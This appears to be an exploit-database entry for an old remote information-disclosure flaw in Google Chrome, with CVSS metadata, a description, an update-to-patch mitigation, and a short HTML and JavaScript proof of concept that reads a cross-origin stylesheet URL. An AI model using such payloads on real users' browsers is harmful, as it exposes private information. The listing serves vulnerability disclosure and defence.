header-logo
Suggest Exploit
vendor:
Google Chrome
by:
Unknown
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: Google Chrome
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: Not specified
CPE: a:google:chrome
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Information Disclosure Vulnerability in Google Chrome

Attackers can exploit this vulnerability in Google Chrome to obtain potentially sensitive information that may lead to further attacks. The vulnerability involves the execution of arbitrary JavaScript code through the use of a crafted web page.

Mitigation:

To mitigate this vulnerability, users are advised to update Google Chrome to the latest version available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37917/info

Google Chrome is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks. 

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>